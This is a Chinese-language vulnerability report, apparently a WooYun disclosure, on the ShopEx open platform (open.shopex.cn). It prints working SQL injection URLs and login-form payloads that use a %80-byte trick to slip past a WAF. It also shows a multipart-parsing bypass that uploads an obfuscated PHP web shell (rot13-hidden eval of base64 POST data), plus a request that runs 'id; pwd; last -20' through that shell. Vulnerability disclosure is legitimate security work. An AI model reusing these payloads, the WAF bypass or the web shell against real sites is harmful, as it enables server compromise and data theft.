### 简要描述: SQL注入. ### 详细说明: BBScan 扫到一个git信息泄露: ``` http://open.shopex.cn/.git/ ``` 使用rip-git.pl把源码下载下来. 源码审计发现一个sql注入: open.shopex.cn\core\application\controllers\docs.php: ``` /** * API接口搜索列表页 * * @access public * * @return void */ public function api_search($category_id){ $this->data['navigations'][] = array('name'=>'开发文档','url'=>''); $this->data['navigations'][] = array('name'=>'API文档','url'=>site_url('/docs/api_list/'.$category_id)); $platform_id = isset($_GET['platform_id'])?$_GET['platform_id']:0; $docs_keyword = isset($_GET['docs_keyword'])?trim(urldecode($_GET['docs_keyword'])):''; $method_type_id = isset($_GET['method_type_id'])?$_GET['method_type_id']:0; /** * * 开发文档页改变布局 */ $this->layout->Layout('doc_details'); /** * * 加载API列表模型,并获取API列表数据 */ $this->load->model('method_type_model'); $api_list_data_temp = $this->method_type_model->get_api_list_all(); foreach($api_list_data_temp as $k=>$v){ $api_list_data[$v['id']] = $v; } $this->data['api_list_data'] = $api_list_data; /** * * 支持平台列表 */ $this->load->model('platform_model'); $platform_list = $this->platform_model->get_platform_list(); $this->data['platform_list'] = $platform_list; /** * * 条件过滤 */ $conditions = '1=1'; if($platform_id>0){ $conditions.= ' AND pm.platform_id='.$platform_id; } if($docs_keyword!=''){ $conditions.= ' AND (m.name like "%'.$docs_keyword.'%" OR m.introduction like "%'.$docs_keyword.'%")'; } /** * * 左边筛选使用 */ $this->load->model('method_model'); $filter_method_list = $this->method_model->get_method_search_list($conditions);//接口列表 $method_type_id_array = array(); foreach($filter_method_list as $k=>$v){ $method_type_id_array[] = $v['method_type_id']; } if($method_type_id>0){ $conditions.= ' AND mthm.method_type_id='.$method_type_id; } /** * * 加载API接口模型 */ $this->load->model('method_model'); $method_list_temp = $this->method_model->get_method_search_list($conditions);//接口列表 foreach($method_list_temp as $k=>$v){ $temp = 
isset($api_list_data[$v['method_type_id']])?$api_list_data[$v['method_type_id']]['name']:'temp'; $method_list_group[$temp][] = $v; } $this->data['method_list_group'] = $method_list_group; $this->data['method_type_id_array'] = $method_type_id_array; $this->data['docs_keyword'] = $docs_keyword; $this->data['platform_id'] = $platform_id; $this->data['category_id'] = $category_id; $this->data['method_type_id'] = $method_type_id;//当前列表ID $this->layout->view('docs/api_search',$this->data); } ``` 三个参数存在sql注入: ``` platform_id docs_keyword method_type_id ``` 搜一下发现已经提交过了: [WooYun: Shopex开放平台某处SQL注入](http://www.wooyun.org/bugs/wooyun-2014-088313) [WooYun: Shopex官方某平台存在SQL注入漏洞一枚](http://www.wooyun.org/bugs/wooyun-2015-0114559) [WooYun: ShopEx某分站存在注入](http://www.wooyun.org/bugs/wooyun-2015-0115779) 漏洞仍没有修复,但上了waf. 程序是CI框架,默认会过滤掉参数中非法的utf-8字节,所以在关键字中插入一个%80(单独的续字节,不是合法的utf-8字符)就能绕过waf了。 ``` http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23 ``` [<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png) [<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png) 继续翻代码,找到一处任意文件上传: open.shopex.cn\core\application\controllers\uploads.php: ``` class Uploads extends CI_Controller { /** * 首页图片上传 * * @access public */ public function home_img(){ if(empty($_FILES['image'])){ $this->_return_msg('fail','上传内容格式不对!'); } if(substr($_FILES['image']['type'],0,5)!='image'){ $this->_return_msg('fail','请确认上传的是图片!'); } $image_name = $_FILES['image']['name']; $image_name_exp = explode('.',$image_name); $image_name = date('YmdHis').mt_rand(0,1).'.'.$image_name_exp[1]; $uploadfile = 
FCPATH.'uploads/home_img/'.$image_name; move_uploaded_file($_FILES['image']['tmp_name'],$uploadfile); $data['img'] = base_url('/uploads/home_img/'.$image_name); $this->_return_msg('succ','成功',$data); }... ``` 利用php multipart/form-data 解析漏洞来绕过waf上传php shell: ``` POST /index.php/uploads/home_img HTTP/1.1 User-Agent: curl/7.33.0 Host: open.shopex.cn Accept: */* Proxy-Connection: Keep-Alive Content-Length: 341 Content-Type: multipart/form-data; boundary=----,xxoo ------,xxoo Content-Disposition: form-data; name="image"; filename="1.jpg" Content-Type: image/png ------ Content-Disposition: form-data; name="image"; filename="1.php" Content-Type: image/png <script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script> ------ ------,xxoo-- ``` shell: ``` http://open.shopex.cn/uploads/home_img/201512122130440.php ``` ``` POST /uploads/home_img/201512122130440.php HTTP/1.1 User-Agent: curl/7.33.0 Host: open.shopex.cn Accept: */* Proxy-Connection: Keep-Alive Content-Length: 34 Content-Type: application/x-www-form-urlencoded c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs= ``` [<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png) 另外还有一个sql注入: ``` POST /index.php/passport/passport/login HTTP/1.1 Host: 122.144.135.142 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718 Content-Length: 131 biz_id=&entid=')or 
updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/122210195190a28293aef4521fe54577e9e384b6.png) [<img src="https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222120536af2f1c1bdb613516cb2ca4d054da28.png) [<img src="https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/1222175044b7a1af0175248b111c6bb3faaa0083.png)